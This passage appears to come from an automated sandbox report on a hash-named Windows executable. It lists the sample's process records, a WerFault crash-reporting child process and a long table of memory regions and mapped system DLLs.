"0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" " cur_dir = "C:\\Windows\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "4" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x384c4000" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1468 -s 764" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 597 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 598 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 599 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 600 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 601 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 602 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 603 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 604 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 605 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 606 start_va = 0x8f0000 end_va = 0x932fff monitored = 0 entry_point = 0x910f50 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 607 start_va = 0x940000 end_va = 0x493ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 608 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 609 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 610 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 611 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 612 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 613 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 614 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 615 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 616 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 617 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 618 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 619 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 620 start_va = 0x520000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 621 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 622 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 623 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 624 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 625 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 626 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 627 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 628 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 629 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 630 start_va = 0x6ca90000 end_va = 0x6cb16fff monitored = 0 entry_point = 0x6cafdbc0 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 631 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 632 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 633 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 634 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 635 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 636 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 637 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 638 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 639 start_va = 0x6c950000 end_va = 0x6ca8efff monitored = 0 entry_point = 0x6c97d880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 640 start_va = 0x72700000 end_va = 0x72721fff monitored = 0 entry_point = 0x727091f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 641 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 642 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 643 start_va = 0x6c8f0000 end_va = 0x6c943fff monitored = 0 entry_point = 0x6c9210d0 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 644 start_va = 0x70000000 end_va = 0x70020fff monitored = 0 entry_point = 0x7001a910 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 645 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 646 start_va = 0x6b0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 647 start_va = 0x1d0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 648 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 649 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 650 start_va = 0x480000 end_va = 0x4a9fff monitored = 0 entry_point = 0x485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 651 start_va = 0x4940000 end_va = 0x4ac7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004940000" filename = "" Region: id = 652 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 653 start_va = 0x4ad0000 end_va = 0x4c50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 654 start_va = 0x4c60000 end_va = 0x605ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 655 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 656 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 657 start_va = 0x480000 end_va = 0x4cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 658 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 659 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 660 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 661 start_va = 0x6b0000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 662 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 663 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 664 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 665 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 666 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 667 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 668 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 669 start_va = 0x6060000 end_va = 0x685ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006060000" filename = "" Region: id = 670 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 671 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 672 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 673 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 674 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 675 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 676 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 677 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 678 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 679 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 680 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 681 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 682 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 683 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 684 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 685 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 686 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 687 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 688 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 689 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 690 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 691 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 692 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 693 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 694 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 695 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 696 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 697 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 698 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 699 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 700 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 701 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 702 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 703 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 704 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 705 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 706 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 707 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 708 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 709 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 710 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 711 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 712 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 713 start_va = 0x520000 end_va = 0x52afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 714 start_va = 0x520000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 715 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 716 start_va = 0x6b0000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 717 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 718 start_va = 0x520000 end_va = 0x521fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\faultrep.dll.mui") Region: id = 719 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 720 start_va = 0x6bf60000 end_va = 0x6c37dfff monitored = 0 entry_point = 0x6c05ee80 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\SysWOW64\\dbgeng.dll" (normalized: "c:\\windows\\syswow64\\dbgeng.dll") Region: id = 721 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 722 start_va = 0x6c880000 end_va = 0x6c8effff monitored = 0 entry_point = 0x6c8d4b90 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\SysWOW64\\DbgModel.dll" (normalized: "c:\\windows\\syswow64\\dbgmodel.dll") Region: id = 723 start_va = 0x70040000 end_va = 0x7006cfff monitored = 0 entry_point = 0x70052b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 724 start_va = 0x7f0000 end_va = 0x8d9fff monitored = 0 entry_point = 0x82d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 725 start_va = 0x6cc40000 end_va = 0x6cc49fff monitored = 0 entry_point = 0x6cc43200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 726 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 727 start_va = 0x70030000 end_va = 0x70037fff monitored = 0 entry_point = 0x700317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 728 start_va = 0x7f0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 729 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 730 start_va = 0x6060000 end_va = 0x6396fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 731 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 732 start_va = 0x530000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 733 start_va = 0x530000 end_va = 0x535fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 734 start_va = 0x530000 end_va = 0x537fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 735 start_va = 0x63a0000 end_va = 0x649ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063a0000" filename = "" Region: id = 736 start_va = 0x530000 end_va = 0x539fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 737 start_va = 0x530000 end_va = 0x53bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 738 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 739 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 740 start_va = 0x530000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 741 start_va = 0x530000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 742 start_va = 0x530000 end_va = 0x545fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 743 start_va = 0x530000 end_va = 0x547fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 744 start_va = 0x530000 end_va = 0x549fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 745 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 746 start_va = 0x530000 end_va = 0x54dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 747 start_va = 0x530000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 748 start_va = 0x530000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 749 start_va = 0x64a0000 end_va = 0x659ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064a0000" filename = "" Region: id = 750 start_va = 0x65a0000 end_va = 0x667ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 751 start_va = 0x6680000 end_va = 0x6751fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006680000" filename = "" Region: id = 752 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" 